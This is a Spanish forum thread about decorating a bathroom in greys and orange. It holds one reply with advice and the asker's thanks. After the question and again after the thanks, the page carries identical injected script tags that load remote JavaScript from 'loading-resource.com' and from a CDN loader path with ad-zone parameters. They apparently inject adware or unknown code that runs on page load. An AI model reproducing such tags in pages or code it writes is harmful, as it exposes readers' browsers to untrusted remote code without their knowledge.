Cómo decorar baño

Hola, mi casa está pintada de gris. El salón está con muebles en rojo y
sofá rojo con cojines en chocolate y paneles japoneses en color
chocolate y beige con motivos en rojo, naranja y chocolate, encima del
sofá hemos pintado un dibujo en el fondo gris en color rojo. Mi
dormitorio tiene los muebles en naranja y en la pared del cabecero le
hemos dado un gris más oscuro y un dibujo pintado en naranja. Dentro de
esa misma habitación hay un baño, que nos falta por decorar, pero no sé
si lo que tengo en mente me iría bien, es lo siguiente:pintar los
azulejos en gris un pelín más oscuro que el que tengo en toda la casa y
luego la pared en ese gris más claro, el lavabo en color cristal y luego
en una pared que tengo que no le llega agua empapelarla con un papel
que tiene como una fotografía de edificios tipo nueva york, londres con
cabinas de teléfono en rojo, y finalmente poner los complementos
(dosificadores, jabonera,etc) en naranja para que vaya con la
habitación.Voy bien con mi idea? Me quedará oscuro? Y por último
necesito un armarito o repisa para guardar los potingues de qué color
puedo ponerlo? He visto en ikea una repisa doble de cristal con hierro
forjado negro muy vintage ¿podría ser? O se me recargará mucho? ¿qué
puedo poner?

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 Respuesta

Respuesta

Si tienes cuidado de que el gris con que pintarás el baño sea lo más claro posible, no veo inconvenientes en ésto ni en el resto de la propuesta.

Sólo una observación: poner los mismos colores en toooooda la casa a veces hace que te "ates" un poco a una determinada decoración.

Podría ser el baño un buen comienzo para "desatarse" del gris, del negro, ¿del naranja y del rojo y poner un toquecito de azul o de verde? Es sólo una sugerencia...

muchísimas gracias, me has ayudado mucho

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>